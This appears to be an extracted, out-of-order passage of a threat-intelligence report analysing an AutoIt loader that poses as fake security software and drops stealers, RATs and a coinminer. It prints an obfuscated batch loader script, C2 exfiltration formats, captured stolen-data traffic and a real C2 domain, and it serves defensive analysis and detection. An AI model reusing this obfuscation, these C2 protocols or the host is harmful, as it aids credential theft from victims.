p1=90059c37-1320-41a4-b58d-816d-806e6f6e6976\u0026p2=55534552\u0026p3=61646D696E\u0026p4=57696E646F777320372053657276696365205\r\nParameter Description Example from Anyrun\r\nExample from Anyrun\r\n(decoded)\r\np1 GUID Client\r\n90059c37-1320-41a4-b58d-816d-806e6f6e697690059c37-1320-41a4-b58d-816d-806e6f6e6976\r\np2 Computername 55534552 USER\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 21 of 31\n\np3 Username 61646D696E admin\r\np4 System Information\r\n57696E646F7773 ...\r\n974696F6E29\r\nWindows 7 Service Pack 1\r\n(Version 6.1, Build 7601,\r\n32-bit Edition)\r\np5 keep for new feature ?\r\np8\r\nResponse (DATA / OK/\r\nResponse command)\r\n504B0304140000080800 ... /\r\n4F4B / Response command\r\nZIP DATA / OK / Response\r\ncommand\r\nThis time the data are only push as hex string to the C2 instead of with an XOR and with a different\r\nstructure in the response to the C2 that the sample of June 2020.\r\nLike the zip doesn't have a password, this can be easily unzipping for getting the content. Anyrun just have\r\nbrowser honeypot but steal also current credentials (wallets, configurations ...).\r\n90059c37-1320-41a4-b58d-816d-806e6f6e6976 // By GUID client\r\n | information.txt // system info\r\n |\r\n +---cookies\r\n | cookies_Chrome\r\n | cookies_Chrome.txt\r\n | cookies_Firefox.txt\r\n |\r\n +---forms\r\n | forms_Chrome\r\n | forms_Chrome.txt\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 22 of 31\n\n| forms_Firefox.txt\r\n |\r\n \\---users\r\n users_Chrome.txt\r\n users_Firefox.txt\r\nThis sample seems to be different of the Taurus loader that use the same loader but have use three different\r\nfiles for be launch in memory. By the way, the hunting of this loader in the past has shown that different\r\nstealers and RAT use this same loader.\r\nTTPs\r\nThe global TTPs used by this loader can be resume on this process graphic (some samples have differences\r\nlike DOS obfuscation) :\r\nHunting\r\nFirstly, we have observed that this seems to use the same autoit builder for run the autoit script. By their\r\nhash we can note two parts on the result. The first part is used on malicious MSI file for run autoit script\r\nwith the builder only as fake installer (early Juny). This doesn't have the same TTPs that this loader. The\r\nsecond part have exactly with the same TTPs and have just some additional obfuscations methods (Early\r\nJuly).\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 23 of 31\n\nBy comparing each case, we can notice that the structure is the same with some differences, and we can see\r\neach part of the code.\r\nDOS script\r\nLot of time, the script isn't obfuscating, the rare cases have a common DOS obfuscation by substrings\r\nmethod on a common base of the alphabet for getting the final code. However, the code rest the same with\r\nthe kill switch measures, certutil command (with a random one letter name of the script) and launches the\r\nautoit payload with the builder.\r\nSet Fx=0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\r\n%Fx:~18,1%%Fx:~15,1% %computername% == %Fx:~39,1%%Fx:~40,1%%Fx:~54,1%%Fx:~46,1%%Fx:~55,1%%Fx:~50,1%%F\r\n\u003c%Fx:~23,1%%Fx:~30,1%%Fx:~21,1% %Fx:~28,1%%Fx:~14,1%%Fx:~29,1% /%Fx:~25,1% =\"%Fx:~48,1%\" \u003e %Fx:~28,1%\r\n%Fx:~29,1%%Fx:~34,1%%Fx:~25,1%%Fx:~14,1% %Fx:~35,1%%Fx:~56,1%%Fx:~26,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1\r\n%Fx:~13,1%%Fx:~14,1%%Fx:~21,1% %Fx:~35,1%%Fx:~56,1%%Fx:~26,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1%%Fx:~22,1\r\n%Fx:~12,1%%Fx:~14,1%%Fx:~27,1%%Fx:~29,1%%Fx:~30,1%%Fx:~29,1%%Fx:~18,1%%Fx:~21,1% -%Fx:~13,1%%Fx:~14,1\r\n%Fx:~28,1%%Fx:~22,1%%Fx:~28,1%%Fx:~28,1%.%Fx:~12,1%%Fx:~24,1%%Fx:~22,1% %Fx:~48,1%\r\n%Fx:~25,1%%Fx:~18,1%%Fx:~23,1%%Fx:~16,1% %Fx:~1,1%%Fx:~2,1%%Fx:~7,1%.%Fx:~0,1%.%Fx:~0,1%.%Fx:~1,1% -%\r\nThis also has just changed the header of the PE builder sometimes in removing a part of the magic numbers\r\nor all sometimes for avoid to be triggers in the detection rule that push as condition that be a valid PE (fix it\r\nin pushing the missing part \"M\" or \"MZ\").\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 24 of 31\n\nAutoit script\nThe obfuscation rest the same with unused functions and While - Switch condition for getting the shellcode\nto inject, this can decode the binaries (like Taurus) or just execute another shellcode just decoded in\nmemory.\nData extraction\nLike said previous many RAT and stealers have been found on this loader.\nRAT Redline (XML) :\n\n_gid/falseGA1.2.913472244.1564489040Intel(R) Core(TM) ix CPU @ xGHzProcessor2Total of RAMGraphic3583.61 MB or 3757686784Mozilla FirefoxC:\\Program Files\\Mozilla Firefox\\firefox.exe68.0.1Google ChromeC:\\Program Files\\Google\\Chrome\\Application\\chrome.exe75.0.3770.100Internet ExplorerC:\\Program Files\\Internet Explorer\\iexplore.exe11.00.9600.16428 (winblue_gdr.131013-1700)OperaC:\\Program Files\\Opera\\Opera.exe1748Adobe Acrobat Reader DC MUI [15.023.20070]Adobe Flash Player 26 ActiveX [26.0.0.131] [...]\nVLC media player [2.2.6]WinRAR 5.60 (32-bit) [5.60.0]English (United States)ID: 392, Name: csrss.exe, CommandLine: [...]\nID: 1804, Name: RegAsm.exe, CommandLine: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30\nEnglish (United States)UNKNOWNUNKNOWNUNKNOWN https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\nPage 26 of 31\n\n\u003ca:WebBaseGlVendor\u003eUNKNOWN\u003c/a:WebBaseGlVendor\u003e\r\n\u003ca:WebBaseGlVersion\u003eUNKNOWN\u003c/a:WebBaseGlVersion\u003e\r\n\u003ca:WebDebugGlRenderer\u003eUNKNOWN\u003c/a:WebDebugGlRenderer\u003e\r\n\u003ca:WebDebugGlVendor\u003eUNKNOWN\u003c/a:WebDebugGlVendor\u003e\u003c/a:FingerPrint\u003e\r\n\u003ca:HWID\u003e7CAAB55F3C2D7D2AA0AD7BDE756AC65A\u003c/a:HWID\u003e\r\n\u003ca:IP\u003eIP Victim\u003c/a:IP\u003e\r\n\u003ca:IsProcessElevated\u003efalse\u003c/a:IsProcessElevated\u003e\r\n\u003ca:Location\u003eLocation Victim\u003c/a:Location\u003e\r\n\u003ca:LogDate\u003e0001-01-01T00:00:00\u003c/a:LogDate\u003e\r\n\u003ca:MonitorSize\u003e1280x720\u003c/a:MonitorSize\u003e\r\n\u003ca:OS\u003eWindows 7 Professional x32\u003c/a:OS\u003e\r\n\u003ca:PostalCode\u003eUNKNOWN\u003c/a:PostalCode\u003e\r\n\u003ca:Screenshot\u003eiVBORw0KGgoAAAANSUhEUg ...\r\n\u003ca:TimeZone\u003eUTC+01:00:00\u003c/a:TimeZone\u003e\r\n\u003ca:Username\u003eadmin\u003c/a:Username\u003e\u003c/user\u003e\u003c/SendClientInfo\u003e\u003c/s:Body\u003e\u003c/s:Envelope\u003e\r\nVariant Autoit Injector (Base 64 + custom algorithm)\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"BRElVD1NTQ==\"\r\nIQomRj5dSxwxBj89HANdNw==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"BRElVCNZVAo=\"\r\nLxcuWCMYfQ4ZJA==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ExsgVQ==\"\r\nB0x+V3xZDlpYJ2YpF1gJW35yPDUAR11SB1IHTHoGKA5cV1sjM39AV1kOfCZrYlVCXVQHDwZJKgcsC1oOCyBvdw==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ExsgXytX\"\r\nQwRpOwRWTQoBbQVmUy1XGS1rDRwaVANSGQBXSHkRDmhsTy1lZWFEXn8jMmMlcQd+SlwUAlNBfxEAWgJPTU9mfTJXAF1+AG5mdzE=\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"ABc8Xzk=\"\r\nUg==\r\n------------------3YI8f9ylk827O44x\r\nContent-Disposition: form-data; name=\"Bw5wRQxe\"; filename=\"LxcuWCMYfQ4ZJA==\"\r\nContent-Type: application/octet-stream\r\nCoinMiner 1ms0rry Botnet (HTTP)\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 27 of 31\n\nHTTP/1.1 200 OK\r\nServer: nginx/1.16.1\r\nDate: xxx\r\nContent-Type: text/html; charset=UTF-8\r\nContent-Length: 1\r\nConnection: keep-alive\r\nSet-Cookie: PHPSESSID=da19fc7e571fde73afc839a4b684260f; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\n1\r\nGET /cmd.php?hwid=C4BA3647 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0\r\nHost: cq17178.tmweb.ru\r\nRest a lot of stealer and RAT used, the domain and IP are quickly used in the time for a mass campaign.\r\nhttps://urlhaus.abuse.ch/url/407605/\r\nWe can note like the initial sample that usurp Malwarebytes solution, this usurps others security solutions\r\nor windows programs (here, Internet Explorer). Malwarebytes solution, this usurps others security\r\nsolutions or windows programs (here, Internet Explorer).\r\nFake 7SFX Internet Explorer\r\nThis which will be more like a Loader as the service (LAAS) solution or the same Threat Actor that use it\r\nfor a mass campaign for resell accounts and leaks on the markets.These targets the individuals and\r\ncompanies with fake software and maldocs.\r\nAll the TTPs match can be consult here.\r\nThe coder of the loader have use quite a few posts posted via russian forums in designing the configuration\r\nand script of the SFX archive.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 28 of 31\n\nCyber kill chain\r\nThis process graph represent the cyber kill chain used by the attacker.\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 29 of 31\n\nIndicators Of Compromise (IOC)\r\nThe IOC can be exported in JSON and CSV\r\nReferences MITRE ATT\u0026CK Matrix\r\nEnterprise tactics Technics used Ref URL\r\nExecution\r\nCommand-Line Interface\r\nExecution through API\r\nExecution through Module Load\r\nhttps://attack.mitre.org/techniques/T1059\r\nhttps://attack.mitre.org/techniques/T1106\r\nhttps://attack.mitre.org/techniques/T1129\r\nPersistence Registry Run Keys / Startup Folder https://attack.mitre.org/techniques/T1060\r\nDefense Evasion Deobfuscate/Decode Files or Information https://attack.mitre.org/techniques/T1140\r\nCredential Access\r\nCredential Dumping\r\nCredentials in Files\r\nhttps://attack.mitre.org/techniques/T1003\r\nhttps://attack.mitre.org/techniques/T1081\r\nDiscovery\r\nQuery Registry\r\nSystem Information Discovery\r\nhttps://attack.mitre.org/techniques/T1012\r\nhttps://attack.mitre.org/techniques/T1082\r\nThis can be exported as JSON format Export in JSON\r\nLinks\r\nOriginal tweet:\r\nhttps://twitter.com/Artilllerie/status/1299249738764689413\r\nhttps://twitter.com/JAMESWT_MHT/status/1301536610606100481\r\nAnyrun Links :\r\nMalwarebytes-Setup.exe\r\nDr.Fone_v3.8.exe\r\nReferences:\r\n7-Zip SFX Modified Module Wiki (Russian)\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 30 of 31\n\n7-Zip SFX Modified Module\r\nTaurus stealer analysis\r\nMSE flag (blackhat conf)\r\nWindows Process Injection: KnownDlls Cache Poisoning\r\nSame reference of the loader\r\nSource: https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nhttps://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md\r\nPage 31 of 31\n\nModified Module SFX module - Copyright (7zsfx). (c) 2005-2016 Oleg Scherbakov\n1.7.0 develop [x86] build 3900 (April 1, 2016)\n7-Zip archiver  Copyright (c) 1999-2015 Igor Pavlov\n15.14 (December  31, 2015) \nThis launches a shell instance for extract the objects.\n   Page 1 of 31\n\n https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md     \nLike 7zip module, this uses an internal configuration for the actions to execute once the process extraction\nof the objects is done. This uses the hide methods for run as background and doesn't overwrite the files if\nalready exists.      \n   Page 3 of 31",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md"
	],
	"report_names": [
		"Analysis.md"
	],
	"threat_actors": [],
	"ts_created_at": 1775434075,
	"ts_updated_at": 1775791276,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.pdf",
		"text": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.txt",
		"img": "https://archive.orkl.eu/0a1a3c85e85c093eda159ff17b7f40e6aee999a6.jpg"
	}
}